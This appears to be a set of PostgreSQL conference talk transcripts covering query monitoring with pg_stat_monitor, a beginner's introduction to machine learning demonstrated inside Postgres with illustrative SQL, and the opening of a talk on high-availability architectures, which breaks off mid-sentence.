known for his accuracy. I love you too, Boris. But I don't know if people are interested in watching us drink coffee. Of course we'd be happy if the speakers hang out here, because later people can also join this video conference and have a face-to-face chat; not with Ibrar, but in general that would be a nice option. Yes. We have another question in the chat. First of all, Simon says thank you to you guys for the talk. And Dave P. asks: how about wait event analysis? That's a good one.
Wait events are not that obvious to monitor, I guess, but how about wait event analysis? Was a query slow because of high CPU time, or I/O time, or blocking lock waits? Yes, yeah, well, that is a great question, right, and that is something we are researching: how to get that right, and how best to do it. We are looking at the overhead, right. If you look at what we've seen the other extensions doing, a lot of wait analysis is done with sort of sampling right now, when you can, and that works well if you're looking at the overall system: you can say the system overall spent so much time on I/O waits, spent so much time, you know, waiting on the WAL, right, or whatever it is. But looking at it on a per-query basis, right, to map those wait events to specific queries, how they contribute time and how much of the response time they are, that is more technically challenging, right, and that is something I know Ibrar is working on. If you have some ideas about how to approach this problem we would love to hear feedback. Or maybe even a patch, you know; it's open source, right. Even if that isn't in the plan yet, just knowing that it's coming, or having ideas about how to implement it, I think is important, because it's not an obvious thing to do, especially given the overhead that it can produce. Good. So I think we just have to wait for people to join here in the text chat, and for the rest we can stop the video broadcast. So, thanks to Peter and Ibrar once again. Thank you also Nick for co-hosting; it's good to have you here. Yeah, thank you. Yeah, and I want to say thanks to Simon, right, for the questions. And obviously as time goes on you want to get more discussion started. I also believe it's good to have those discussions when you have something meaningful to show, right, and to play with, rather than just an idea that we want to do X. But that is something we sure can and should do more of, and better. Good. And with that, just more positive feedback in the chat, people saying thanks for the presentation. So I think it's very appreciated. Thank you guys. Cheers. Thanks. Thanks for your time. Thanks.
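For readers wondering what the sampling approach mentioned here looks like in practice, below is a minimal sketch in plain SQL. This is not a pg_stat_monitor feature; the wait_samples table is a made-up name, and in a real setup you would run the INSERT on a schedule (cron, a background worker, or an extension that does the sampling for you).

```sql
-- Hypothetical sampling table; fill it every second or so from a scheduler.
CREATE TABLE IF NOT EXISTS wait_samples (
    sampled_at      timestamptz DEFAULT now(),
    pid             int,
    query           text,
    wait_event_type text,
    wait_event      text
);

-- Take one sample of what every active backend is currently waiting on.
INSERT INTO wait_samples (pid, query, wait_event_type, wait_event)
SELECT pid, query, wait_event_type, wait_event
FROM pg_stat_activity
WHERE state = 'active' AND pid <> pg_backend_pid();

-- Rough per-query wait profile: how often each query was seen in each wait.
SELECT query, wait_event_type, wait_event, count(*) AS samples
FROM wait_samples
GROUP BY query, wait_event_type, wait_event
ORDER BY samples DESC;
```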
If you're tasked with optimizing PostgreSQL performance, chances are you're relying on the pg_stat_statements extension to capture information about query performance. While this extension provides a lot of great insights, PostgreSQL allows you to go even further! In this presentation we introduce pg_stat_monitor, an open source extension based on pg_stat_statements which provides such advanced query performance details. We talk about the additional design goals we had and why those are important, the additional information we capture, and how you can use it to get your PostgreSQL running even faster.
10.5446/53277 (DOI)
Hello, everyone. It's a pleasure to be with you today to talk about artificial intelligence. This is a topic that I've been wanting to explore for a while, and fortunately, during the COVID period, I've had a chance to sort of dive into it, and I'm going to share what I've learned in the next 40 to 45 minutes. My name is Bruce Momjian. I am one of the PostgreSQL core team members and also an employee of EnterpriseDB for the past 14 years. This presentation, along with dozens of others, is available at this URL right here. So if you'd like to download this presentation, feel free to go to that URL and you will find this presentation there, along with many others and recordings of many presentations. So what are we going to talk about today? We are going to talk about artificial intelligence. This is obviously a very popular topic; it seems to be a hot area of discussion and research. And I'm going to cover today specifically what artificial intelligence is; we'll have a little philosophical bend there. Then we're going to dive right into machine learning and deep learning. There are a lot of talks about artificial intelligence, but my goal for this talk was to really break it down and explain exactly what artificial intelligence is. How does it operate? How does it kind of work? How do you set it up in a very rudimentary way? This is not really a talk about how to develop an AI application. This is more of a foundational topic of sort of what is it, how does it use data, and how does it work from a specific standpoint. Item three, we're going to show you a demonstration of using artificial intelligence with my favorite database, Postgres, of course. Item number four, we're going to talk about hardware and software efficiency, particularly how to use different software libraries in general. We'll talk a little bit about tasks that AI is very popular with right now, and then sort of close out with why to use a database. So what is artificial intelligence? This is a quote that I kind of pulled out of Wikipedia. Most of the slides actually have URLs at the bottom. So if you see blue at the bottom, probably the easiest thing is to download the slide deck and just click on the URL there in the PDF, and it'll take you right to the page. So again, if you need more information, many of the slides have a URL at the bottom where you can go to get more information. So the definition that I thought was the best was machines that mimic cognitive functions that humans associate with the human mind, such as learning and problem solving. And that's kind of an interesting point. Mimic cognitive functions. Is it cognitive functions? Is it not cognitive functions? The jury's still out kind of on that one, but there is sort of an unusual philosophical impact to how you answer that question. And this is again a quote, not a quote, but a sort of phrase, that encapsulates the article that you see there at the bottom from the Atlantic. And the basic concept is that if artificial intelligence is the same as human intelligence, you're basically saying that if only the physical world exists, only things we can see and touch, then human intelligence must therefore be a physical process, and it only differs from machine intelligence because it's not naturally developed. So it's more a question of where it comes from, not actually the nature of what it is.
It hence differs only in how it's created. And the corollary to that is that human free will is basically an illusion because it's merely physical processes in your mind and other people's minds that cause these thoughts and feelings and values and so forth. I'm not going to go any farther than that, but it's kind of an interesting thought about artificial intelligence and how we see it. Is it mimicking human intelligence or is it really the same thing just created in a different way? I'm going to leave it there. There is a long history of artificial intelligence. I remember, I used to have a friend who worked on fusion energy in the 70s, and they said, I said, when do you think it'll be done? And they said, oh, it's like 10 years away. Well, artificial intelligence is this thing that's always 10 years away, historically in the computer field. There's a pre-computer philosophy about artificial intelligence. Then there was a period where robotics was very important, where human motion was considered to be sort of the primary focus of artificial intelligence and the Turing test, which had its own sort of cognitive filter that you would go through. The 80s was a big period for expert systems where you took people's experience or experts' experience and you fed that into a computer to create like a decision tree. Then there was a period in the 90s and later called AI winter, where there was a lot of disillusionment over expert systems. Robotics was really not considered to be artificial intelligence the same way that people thought of it at that point. Now we're seeing obviously resurgence and we'll be talking about why that is in some of the specific cases that our computers are being used for artificial intelligence going forward. This slide is kind of interesting, obviously, the beautiful colors, but it's interesting because it's trying to sort of show you the layers of artificial intelligence. So there is this large field that is considered to be artificial intelligence, that field obviously goes back to robotics and expert systems and all the other stuff that went before. Then inside the artificial intelligence is a subtopic called machine learning. I'm going to show you specifically what machine learning looks like and how we can create a rudimentary machine learning sort of system as part of this demo. Then finally inside that machine learning is a smaller subset called deep learning, which is a subset again of machine learning. I'll show you what that actually looks like. If you want more information, there is a three hour video link at the bottom of this slide. That video is by an MIT professor and he goes into a great amount of detail of walking you through various machine learning and deep learning kind of problems. So if you really want to deep dive in this, that video I do recommend as sort of a very good primer on exactly what's going on with machine learning today. So this is sort of our first slide related machine learning. Further slides are going to build on this, but I need to highlight a few concepts here and again the pattern is the same. We have three basically tensors. The pink little rectangles, the three sort of piece rectangle is something called a tensor. The first tensor you see up at the top is what we call the initial state of the tensor. Tenser is a technical term that used for machine learning. 
Tenser is kind of the same thing as a vector in mathematics, but it has sort of an unusual mathematical meaning that it doesn't apply here, but that's the term that AI just kind of went with. So that's what we're going to call it. So that's the tensor in the first state. And you can see it's completely empty. All of the neurons, in this case, the tensor that we're showing right here has three neurons in it, neuron one, neuron two, and neuron three. So this is the whole thing is the tensor and each individual piece is called a neuron. And you can see that the neurons are blank. They're empty because the initial state of the machine learning is that it doesn't know anything or it hasn't learned anything technically in AI speak. It hasn't learned anything. Then in the middle of this slide, you can see the tensor state while it's consuming training data. And as it's consuming training data, it's actually changing the weight of the three tensors. That's why I have sort of a slash because these values are going up and down as the data is being fed into the various neurons which are part of the tensor. And when we get to the demo, I'll actually show you some tensors and some neurons and you can kind of see the weights physically as numbers. But right now, we're just going to do it visually. Once you're done with the training data and you set the weight of your tensors, I'm sorry, the weight of your neurons, then you get to your live usage. And that is where you feed requests into the tensor. The individual neurons make measurements of the request coming in, apply the weights to it, and then out of it comes a result. So this is the simplest case of machine learning where we have the initial state of the machine learning. And then you can see that the initial state of the neuron where we have the initial state, we have a training phase where the neuron weights are set. And then finally, we have a request at the bottom where we're sending requests in and we're using the weights that we set in the neurons to generate AI based results. So there are actually three types of machine learning and I'm going to visually show them to you as part of this slide. First, we have the unsupervised machine learning. You don't see this too much, but it has some usefulness. And it's probably the simplest case, okay, where we've got an initial state, which again is blank, and we feed the training data in, but we have actually no results associated with it. We just have training data going in and weights being set, but they're not the key to any sort of result value. They're just data, okay. And then we have requests coming in and then a result comes out. You don't see this used too much because it's hard to map it to an actual problem space. The only one I remember seeing somebody explain is that you wanted, if you had images of cats and dogs, you would somehow feed the data in without telling it whether it's a cat or a dog. And the system would kind of identify there's two groups. And that's one group, but I don't know what it is. And that's another group, but I don't know what it is. So that's the most common unsupervised learning I've seen. Not used a whole lot because it's a little harder to, but it's good for categorization, I would say, where you don't want to sort of spend a lot of time setting up your training data. The supervised state is obviously much more common. In this state, again, the initial state's the same, but in the intermediate during the training phase, we actually have results. 
So there are results that are being sent into with the training data. So you've got some data and then a result that is associated with that particular data set of each record, let's say, you send something in. And this is actually the correct output to go to that data. Here's another piece of data. Here's the correct output goes to that data. And as you can imagine, it's a lot easier to kind of come up with useful cases for this. And then obviously, when you have, when you're actually using it live, you have a better model of weights and they're kind of easier to get to get a result to come out. And I'll show you example of this. It would not show you the demo. The third method is also very popular, very complicated actually. And this is what we call reinforced reinforcement machine learning. It's the same as supervised machine learning, except you'll notice that there is this arrow from the result coming back into into one of the neurons or multiple neurons probably back into the tensor basically. And in this case, what you're doing is that you're running it just like supervised learning, but you have some type of mechanism so that when the results are coming out, and the system has perhaps guessed incorrectly, you can feed that back into the neurons to improve the weights of the neurons. So this is like a feed. This is like supervised learning, except it has a feedback loop associated with it, where you're using the results to improve the future predictability or the future probability that the AI will get it correct. And you can imagine this gets kind of complicated. How much do you have the results feedback? Do they overwhelm what's there before? And there's a whole bunch of research about how much results should feedback and so forth. But we're not going to get into that. Just the concept of reinforcement makes sense. This is sort of like when, you know, when you're getting maybe a recommendation engine, and it's using some kind of AI, if it recommends something and you choose you don't like it, that is some information it could use to try and do better in predicting future videos or books or whatever. So that would be an example of reinforcement learning. Now, I promise to talk about deep learning. And deep learning is really just a very simple learning. And deep learning is really just machine learning taken to another level. So with machine learning, we really had one stage of tensors. Okay. And we fed our data in, we had one set of neurons, there may have been millions of neurons, but only one stage of the machine. And then you had a result coming out. What you have with deep learning is a case where you have multiple machine learning neurons stacked in stages. So you go into the first stage of your tensor, all the neurons are then basically going through their weights. There's an output that comes out. And then as you can see in this diagram, every single neuron feeds to all of the neurons in the next stage. So if I have three neurons in the first stage and three neurons in the second stage, I effectively have nine transfers of data because each of the first neuron goes to the second three, the second neuron goes to the second three, the third one goes to the second three. And again, then in the second stage, this happens again, and the third stage and so we're then finally getting a result. Now, this is obviously a very simplistic case. In normal cases, you may have a thousand stages. Okay. And you may have thousands of neurons or millions of neurons. 
So you can imagine this gets really computationally expensive, which is why you see a lot of GPU usage. I'll talk about that later, but see a lot of GPU usage with artificial intelligence because you have, if you're using deep learning, you've got not only the neurons, which may be in the thousands, but then you've got, you know, perhaps millions, but then you've got maybe hundreds of thousands of stages that they all have to go through. So you've got a lot of parallel work that needs to go on. And this is a good example of why a GPU, again, there's a URL there at the bottom to give you a better idea of kind of what's going on there. So you see deep learning a lot for things that would happen in stages. For example, if you're analyzing an image, you might have one stage that separates the foreground from the background. And another one that, you know, maybe works on the colors and another one that works on, you know, the face or, you know, looks for a tail or something, you know, in an image case or in vocal AI where it's having to recognize speech. You can have one set, one machine learning stage that deals with pitch and volume of the speaker and another one that tries to identify words within the speech and then another one that kind of acts on the words. So you can kind of see why you would have to go through stages to get through, you know, a case where you're doing voice recognition. So again, some systems lend themselves to deep learning. Some of them don't, but again, they can be really very computationally expensive. It's kind of an interesting sort of enhancement of the basic machine learning concept that allows you to tackle much harder problems. So I promised to give you a demo and I am not going to disappoint. Here is a demo using Postgres with artificial intelligence. Now, I don't suspect anyone would actually use what I'm doing in production, but I do think that this is going to give you a good visual of exactly what is going on. What do these weights look like? How would you kind of code it up? And I picked a really simple problem. I didn't pick, you know, identify dogs against the background or, you know, voice recognition or anything like that. I just picked a very simple numeric problem. Does an integer value have any non-leading zeros? Okay. Again, you would never do AI for this. But the reason I'm giving it to you is so that we can see really clearly what's going on. So for example, the first bullet there, 31903, has a zero in it. In this case, the fifth digit, or the second digit from the right is zero. In the second bullet, the 82392 does not have a zero. And we're going to use AI to predict, given an integer, does it have a zero in it? So we kind of think about, okay, how are we going to do that? What would our neurons look like? So to kind of set myself up, I realized that I was going to be doing some array operations. So I picked something that was very concise, very easy to understand. I picked a server-side language called PL-PURL. Again, very unlikely you would use this particular example. But I think it's illustrative of what we're going to be, of what actually happens in AI. And again, if you want to follow along, that URL there in blue is actually the script that I used for this presentation. So if you download that SQL file and just run it through PSQL, you'll actually see the entire demo on your screen. And you can play with it, which is kind of interesting. So how am I going to do this? So what I need to do is I need to generate a tensor. 
So I'm going to create a PL-PURL function here called generate tensor. And the tensor is going to have 11 neurons. So the first neuron, first 10 neurons, indicate how many digits does this number have? Because the more digits a number has, the more likely it is that it's going to have a zero in it. Because if it's only two or three digits, it may not have a zero. But if it has like nine digits, well, that's probably maybe more likely there's going to be a zero in there. So what this actually does is use PURL here to identify, does this have x or more digits? So does it have a 10 or more? Does it have three or more or whatever? And based on how many digits it has, we can then predict the likelihood of the zero being in there. And then the final one is kind of a throwaway one, really easy. It's the number divisible by 10. Because if the number is divisible by 10, we know the last digit is zero. The rightmost digit is zero. So that's sort of an easy one for us. And then we're going to map that to true and false. We're going to create a Boolean array. If you're not familiar with arrays in post-grads or Boolean, you can look it up. But this is basically going to generate a tensor for us for a given value. Now we have to create a training set. Remember, that was the we created our tensors. There's 11 of them. I'm sorry, we created a neuron which had 11, I'm sorry, create a tensor that had 11 neurons in it. Now we need to create our training data. So what I did here is I created a table called training set. It has a Boolean output and it has a tensor array. That's what the brackets mean. Boolean bracket is a Boolean array. And then I decided to take 10,000 integers. Okay. They're not actually random numbers. They're actually numbers with a random number of digits. It's not quite the same. Because if you just choose random numbers, you're going to get a lot of really long numbers. This gives you a lot of short numbers and long numbers to kind of together. It makes it a little more interesting. Okay. And I'm going to convert that. I'm going to insert the data into the training set. So I'm now created you know, effectively 10,000 training data that I have. And this is a supervised learning because in fact what we're going to what we're doing right here on this line is we're saying is there a zero in that number? Right. So we generated these 10,000 numbers. And for each number, we're going to say is there a zero there? A non-leading zero. And if there's a non-leading zero, it's true. If there's not a non-leading zero, there's false. Okay. Again, you would never do this in real life. But I think it's I think it's going to be illustrative. Okay. Let's look at our training set. What do we see? We see a bunch of numbers there on the left. Some of them long. Some of them short. That's what we wanted. We wanted a variable length there. Then in the second column, we identify whether that number has a zero in it or not. If it's true, there's a zero there. If there's not, there's a false there. Okay. And you can if you verify, you can see, you know, the long numbers or some of them are false. Some of them are true. Some of the short numbers are false. Some of the short numbers are true. And then over here on the on the right, we have the we have the neurons and there are the tensors and the 11 neurons for every tensor. So there's 11 true or false there. And again, those tensors match the numbers, depending on how many digits it has. If it has a lot of digits, it has more false. 
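The actual demo script is PL/Perl and lives at the URL mentioned in the talk; what follows is only a rough sketch of the same idea in plain SQL, so the shape of the 11-neuron tensor and the training set is easier to see. The function and table names mirror the talk, but this is not the original code.

```sql
-- Eleven neurons per tensor: neurons 1..10 say "does the number have at
-- least d digits", neuron 11 says "is it divisible by 10".
CREATE OR REPLACE FUNCTION generate_tensor(value int)
RETURNS boolean[] LANGUAGE sql AS $$
    SELECT array_agg(length(value::text) >= d ORDER BY d) || (value % 10 = 0)
    FROM generate_series(1, 10) AS d;
$$;

-- Supervised training set: 10,000 integers with a random number of digits,
-- labelled true when their text form contains a zero.
CREATE TABLE training_set AS
SELECT value,
       value::text LIKE '%0%' AS has_zero,   -- the supervised label
       generate_tensor(value) AS tensor
FROM (
    SELECT (random() * 10 ^ (1 + floor(random() * 8)))::int AS value
    FROM generate_series(1, 10000)
) AS numbers;
```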
If it's a shorter number, it's more true or something like that. So again, the number of truths and false is in the first 10 indicates how long it is. And the last one just indicates whether it's a zero at the end in this case. In this particular set of 10, we don't have any, but you get the idea. So what else do we need to do? As I told you before, we need to feed the training data in and we need to set the weights for the neurons. Right. Remember that. So what I've actually done here is I've created a function called generate weight, which effect, this is a multi-page function. These are the variable definitions. This is the body of the function. And what the body of the function does is to take the data you fed in, run through all the rows, and for each neuron in the row of tensors, we're going to spin through, we're going to set the weight of how important that particular neuron is to the result. This is kind of the crux of what's going on in AI. We're actually using the training data with supervised learning, because we know whether it has a zero or not. Okay. And we're setting the weights of the neurons based on how predictive that particular neuron is to producing a result that we want or a result that we don't want. Okay. Some neurons may be very unpredictable. Some neurons may be very predictive. You don't know, but that's what the training data is for. You set up the mechanism, you don't have to worry which neurons are useful. If the neuron is not useful, it won't affect the results. Important neurons will affect the results. And that's one of the beauties of AI and all. I'll talk about that later when I give the example of fraud detection, which is kind of interesting. We'll talk about that at the end. This is the rest of it, which basically sets the neuron weights and so forth for the tensors. Again, this is all in the SQL file you can download. Then we have a tensor mask, which has to identify whether the weights should apply to this particular real result data that comes in and return the weights where our neuron value matches the desired output. If it doesn't match the desired output, we don't care about. And then we have some internal work. We have to sum the weights. We have to do something called softmax. So the weights add up to 100% or one, technically. So you're looking at weights that have all sorts of different values. You want the total to be 100% or one so that they're all kind of relative to each other, how important are they? It doesn't matter what the actual weight is. It's how important is that weight to all the other weights that exist in the system, in that particular tensor. That's what we do here. Then we basically create a table called tensor weights true and tensor weights false, where we're loading the truth and the false into and setting the weights. Then we actually get some results out from the training data. So these are the actual weights that each of the neurons have gotten within the true tensor and the false tensor. You see they're kind of different, but you have different weights, depending on whether you're trying to be true or false. Now we're going to run actual examples. So we've done, we've set up our neurons. We've run through the training data. We've set our weights. Now what we're going to do is we're going to test the numbers. So I'm going to send 100 in and it would have run it through some weight and softmax and tensor mask and so forth. And what we end up with is something kind of lackluster. 
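Again, this is not the exact generate_weight() from the demo script, just a hedged sketch of the idea for the "true" class: weight each neuron by how often it is set among training rows that do contain a zero, then normalise so the weights sum to one (a simple normalisation standing in for the softmax step described above).

```sql
WITH raw AS (
    SELECT d AS neuron,
           avg(CASE WHEN tensor[d] THEN 1.0 ELSE 0.0 END) AS weight
    FROM training_set
    CROSS JOIN generate_series(1, 11) AS d
    WHERE has_zero                      -- look at the "true" class only
    GROUP BY d
)
SELECT neuron,
       weight / sum(weight) OVER () AS normalised_weight  -- weights now sum to 1
FROM raw
ORDER BY neuron;
```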
It predicts 22 percent chance it has a zero in there. Well, it obviously does have a zero in there, so it's pretty wrong. This is not a great example. Just because it is, that's that's AI. Some are right. Now if I go to 101, notice when I have a hundred, 22 percent that there's a zero in there. When I do 101, it drops to 11 percent. Why is that? That's because that last neuron was recording whether this was divisible by 10. Now we know as people, this is by 10, there's zero there, but system doesn't know that. It has to look at the training data and how predictive was that particular neuron compared to all the other neurons in predicting a zero. So you can see a small change between 100 and 101 in the sense that this last neuron was true in 100 and false in 101. A small example there. Then we pick a big number. This one also is wrong. It says there's a 68 percent chance down here that there's a zero in there. In fact, there's no zero in there at all. It is what it is. Now we're going to test a thousand values. So I'm going to generate a thousand values again, random number of digits. I'm going to run it through a common table expression, basically doing the softmax and the weights, set the weights for that. Then I'm going to analyze it to predict how accurate it was. I'm going to end up with this result. Now you can see here in black a whole bunch of the last couple rows that we came through. Six, this number, this number, and again predictions of how likely that was to have a zero or not, and then how accurate it was. What we get here at the bottom is a prediction of how accurate this particular example was. 72 percent roughly in accuracy. Not too bad. 15 percent accurate, or plus or minus, I think that would be the, if you just randomly did it. Again, this is not a super useful example, but the beauty of it is you can see how all those things came together. The creation of the neurons, the training set, the setting of the weights, and then kind of coming to a result that's not fantastic, but it's certainly better than random chance. Okay. So let's shift gears a little bit and let's get more specific about exactly how this is used in practice. Again, as I said before, nobody really would be doing what I'm doing. That's what I'm doing was a great illustrative example, but not something in real life. In most cases, you're going to use some type of client or server-side library to do artificial intelligence. Now, there are a number of popular ones, Madlib and Matlab, which are not the same, are very possible, popular. You've certainly heard of TensorFlow. Weka and Scikit, as I remember, are open source. I think also Madlib is one of them is. What's interesting is I have two URLs here. One is using Scikit at the server-side, which is what I did with PL-PURL, except you use PL-Python. That's kind of interesting. And then a client-side example of using Scikit as well. So again, you have all these options of what do I want, do I want a client-side, do I want a server-side. Probably you're going to do it in Python or a scripting language similar. And you see a lot. These are just very, very popular ways of doing AI. Another thing I mentioned earlier is the real benefit of GPUs. Again, if you're doing particularly deep learning where you've got thousands of tensors that have been feeding, thousands of tensors that may be going on for hundreds or thousands of stages, the ability to do parallel processing is incredibly useful. So again, tensors can have millions of neurons. 
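Once a scoring query has produced a probability for each test value, the accuracy figure at the bottom of the slide is a one-liner. The predictions table here is a hypothetical stand-in for whatever the scoring query outputs, with one row per test value, a predicted probability, and the true label.

```sql
-- accuracy = how often a ">50% chance of a zero" prediction matched reality
SELECT avg(CASE WHEN (predicted_probability > 0.5) = actually_has_zero
                THEN 1.0 ELSE 0.0 END) AS accuracy
FROM predictions;
```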
Deep learning can have thousands of layers. And because you have to pass each neuron value to all the other ones in the next stage, there's a lot of repetitive calculations. So again, GPUs are very popular in this environment. So let's talk about some specific tasks that you see with machine learning. These are the common ones I've seen a lot. Chess is one that we used to have when I was a kid. You have sort of computers that could play chess. That is an interesting case, but it's a little easier for AI because it's a limited number of squares. There's a limited number of moves possible. So you can kind of force that a little easier. Jeopardy, which was done by IBM's Deep Blue, became very popular, although Deep Blue, in terms of actual user real-world application, has been somewhat of a disappointment. So that's kind of a cautionary tale. Words recognition is something you probably do on your smartphone all the time. Don't really need to think of it as AI, but it certainly is. Search recommendations certainly have an AI component to it. Video recommendations as well. Image detection, I talked about that. A lot of AI examples use video image detection. I'm not a big fan of that because it's very hard to see. Images have so many dots. How do you really understand how all those dots are processed? Because it's just sometimes computationally so big it's hard to really grasp. That's why I used a more simple example. Weather forecasting, that's a great one where you basically say, okay, we have this weather pattern, these weather conditions. Historically, what has happened when that weather condition has existed? What has happened next? You feed that data into the computer and then it's like, oh, okay, when 80% of the time when this happened, this weather pattern happens, the result is something, is a new weather pattern. You can kind of see how that would be used in artificial intelligence. Probably the most practical one that I've ever heard is fraud detection. Fraud detection for invalid financial transactions. Obviously, there's a great need here for financial institutions to have this ability. There's a URL there at the bottom by a US bank representative talking about how they use fraud detection. I found it very interesting. What I find really interesting about this picture slide is that if you were given the job of creating an AI machine for fraud detection, what things would you measure? What would your neurons measure? They may measure the charge amount. They may measure whether the transaction was with a magnetic stripe or a chip or a pin or an online charge. It may measure the vendor distance between the charging, the chargee's billing address and the vendor. It may be the distance from the last chargee transaction. It may be the country of the vendor. It may be the previous charges to this vendor from the chargee. It may be previous fraud charges from the vendor. Who knows? They all look reasonable to figure out fraud. But which ones are more important? What would the weights be? The beauty of AI is you may go to an expert and ask the expert, how important are all these things? Which is this twice as important as that one? Is this one not that important? And the expert may be able to give you rough numbers there. But the beauty of AI is you don't have to do that. You can basically, for fraud detection, choose your attributes. It may be the ones I mentioned or some other ones. You would create a machine learning neurons for each attribute away measuring each one. 
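As a hypothetical illustration of those attributes laid out as columns, the training data described next could look something like the table below. None of these column names come from a real fraud system; they simply mirror the list of attributes just mentioned, plus the supervised label.

```sql
CREATE TABLE fraud_training (
    charge_amount           numeric,
    entry_method            text,     -- magnetic stripe, chip, pin, online
    vendor_distance_km      numeric,  -- vendor vs. billing address
    km_from_last_charge     numeric,
    vendor_country          text,
    prior_charges_to_vendor int,
    prior_fraud_reports     int,
    is_fraud                boolean   -- the supervised label
);
```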
Then you create some training data from the previous fraudulent and non-fraudulent transactions. And you have attributes that match the neurons. And whether that transaction was valid or fraudulent. So you would probably feed in a whole bunch of valid transactions and a whole bunch of fraudulent transactions. Again, this is supervised learning. You're giving the results to the AI system so it can figure out how important those neurons are for detecting whether something's a fraud or not. Then you feed the data, training data into the machine to set the weights and based on how much the weights are, I predicts the validity of the fraudulent transaction. Then you start feeding real data in and you get your results. And then if you're doing reinforcement machine learning, you correct, in incorrect cases, you're now feeding some of your result data back into the machine learning to improve its predictability. So the beauty of that is you don't have to sort of get an expert, figure out exactly what is most important. You can kind of come from a distance and say, here are some things I think might are important. Let me feed a whole bunch of data in, let the computer figure out how important each of those are. And then again, feed your real data in to get results and use the results that come back when it's incorrect to reinforce, or whether it's correct actually, to reinforce those weights or make adjustments over time. So finally, we talked about machine learning, deep learning. I showed you a PL Pearl example. We talked about fraud detection and all these other things. I think one of the sort of questions in my mind is why would you use a database here? Like what value does a database bring here? A lot of machine learning is currently done in on custom platforms. It's sort of this thing that's sitting on the side of your data center because the technology is still changing and people are installing new software and there's a whole bunch of churn going on in a lot of ways. But ultimately, once the field kind of settles, you see this a lot in the database industry where something's external and eventually as it settles, it becomes part of the database itself. Machine learning needs a lot of data. And most of your data is already in your database, particularly for something like fraudulent transactions. Your data is already there. Why would you be downloading it to another system and then bringing it back again if you can do it in the database itself? Particularly, why do that? The advantages of doing the machine learning in the database are several of them. Certainly, you have previous activity as training data is all there. You have seamless access to that data because it's all kind of relationally set up. You can do things very creatively. For example, you could actually check a transaction for validity before you commit it. You can say, I'm about to commit this transaction. Let me go run it through the AI engine in the same database and see what the result is. And if the result says it has a high probability of being fraudulent, maybe I don't want to commit that transaction. That's kind of interesting. Of course, when AI is part of your system, it can benefit from database transactions, concurrency, backups, things like that. And there's a huge amount of data types, particularly in Postgres, where you have complex data types, full text search, GIS. GIS is a great example. Having GIS ability to know how far something is or where something is on the globe can be really useful. 
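A sketch of the "check it before you commit it" idea mentioned above: fraud_probability() and the transactions table are hypothetical stand-ins for whatever trained model and schema you actually have, and the 0.9 threshold is arbitrary.

```sql
CREATE OR REPLACE FUNCTION reject_likely_fraud() RETURNS trigger
LANGUAGE plpgsql AS $$
BEGIN
    -- fraud_probability() would wrap the trained model, whatever form it takes
    IF fraud_probability(NEW) > 0.9 THEN
        RAISE EXCEPTION 'transaction % looks fraudulent', NEW.id;
    END IF;
    RETURN NEW;
END;
$$;

CREATE TRIGGER check_fraud
    BEFORE INSERT ON transactions
    FOR EACH ROW EXECUTE FUNCTION reject_likely_fraud();
```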
And of course, Postgres can do GPU things as well. So I want to thank you for listening today. I'm leaving you with an image, a real image, from Phoenix, Arizona. You can wonder why I chose that image, but I think there's some interesting sort of AI angles to that picture. So I hope you've learned a lot. Again, the slides are available on my website. If you'd like to download them or even download the SQL and run the demo yourself, I've enjoyed speaking to you today. And I'm looking forward to a really good conference. So thank you.
Artificial intelligence, machine learning, and deep learning are intertwined capabilities that attempt to solve problems that defy traditional computational solutions — problems include fraud detection, voice recognition, and search result recommendations. While they defy simple computation, they are computationally expensive, involving computation of perhaps millions of probabilities and weights. While these computations can be done outside of the database, there are specific advantages of doing machine learning inside the database, close to where the data is stored. This presentation explains how to do machine learning inside the Postgres database.
10.5446/53278 (DOI)
Hi and welcome to FOSDEM 2021. In the PostgreSQL developer room today we are talking about PostgreSQL architectures in production. I am Dimitri Fontaine and I have written a book named The Art of PostgreSQL. It's a book for application developers that you can find in paperback form, or that you can have online as an EPUB or PDF, of course. So this book is mainly for application developers who want to get better at benefiting from PostgreSQL's advanced SQL feature set. And today, in the context of FOSDEM, I am offering a special discount code, fosdem2021. So use that in the checkout form on the website, theartofpostgresql.com, for a 30% discount. Back to the main topic of today: PostgreSQL architectures in production. What does this title mean exactly? It's a pretty long phrase, so let's zoom in and detail every word of this sentence: PostgreSQL architectures in production. The first word of course is PostgreSQL, the world's most advanced open source relational database. That's a mouthful. What does it mean for your application, as an application developer? The part of your application's stack where you run PostgreSQL is going to solve an important problem for you, in a way that you don't have to think so much about it in the code you write to run your business, your application, your logic. And this problem is concurrency. You want a single data set, managed in PostgreSQL, in such a way that many concurrent transactions may happen at the same time while your business guarantees are indeed guaranteed by the system, by PostgreSQL. So what you solve with PostgreSQL in your stack is concurrency. Now, the second word in the phrase is architectures. If you draw your stack as an application developer, with the different components as they run in production as different services that connect to each other, and if you draw the dependencies between the services, that's what we call a production architecture. And in production means it's live now. In the picture on the slide you can see a sports event being broadcast on television, on TV. For the broadcast to happen you need production engineers to actually be there at the console while the event is happening. In our job we are lucky enough that we don't need to be there at all times while customers are using our software. We can deploy it and it mostly works automatically. The key for that to happen is availability. In our case, because we are talking about PostgreSQL, which is a database server, we are talking about the availability of both the service and the data. And if you don't want to be at the console at all times while users are actually using your application, you want high availability. Availability can be measured as a number of seconds of downtime per period of time, usually per year. And if you take the ratio between the interval of time when the service was available and when it was not, then you have the famous 99.999% of availability. If you reach a certain threshold, one that makes sense for the application and the business you are working in, well, then you have high availability. To reach high availability, if you're allowed something like five minutes a year of downtime in the case of a failure of a hardware component in production, well, what's next? If you only have five minutes a year to react to that, you want as much as possible to be automated.
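As a side note on the numbers, the "five minutes a year" figure really is just the arithmetic behind five nines, which you can check directly:

```sql
SELECT round(365.25 * 24 * 60 * (1 - 0.99999), 2) AS minutes_of_downtime_per_year;
-- about 5.26 minutes
```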
So how do you automate a failover, the process of going from one box that has failed to another one, to host both the PostgreSQL service and the data online? Can you automate all of that, and how much of it should you automate? When using PostgreSQL, it is the classic PostgreSQL architecture that allows you to automate some of those things. Usually we use one primary and two standbys, in a way that even if you lose a standby, you know you still have two copies of the data at all times, which means you can still accept transactions that are modifying the dataset, writes in your application. Because the main issue is: if you have no standby at all, if you are left with one node, the primary, should you accept writes? You can either protect the data, and then you need to refuse the writes, or you can protect the service, and then you accept the writes, but in case of the next failure, well, then you might lose data. So that's the real trade-off that you need to decide on with a database system that needs to handle availability of both the service and the data. The next part of this presentation is going to focus on the tools that are provided by PostgreSQL, by core Postgres, for you to implement failover. So, included in Postgres to implement failover is streaming replication, and streaming replication can be set up to be either synchronous or asynchronous. When we say that it's synchronous, we don't mean sync as in the real world, where it would mean that two different events are happening at two different places at exactly the same time, that they're in sync. That's not what it means: we pretend it's sync because we wait until it has happened in this other place. In the drawing there we have three nodes, A, B and 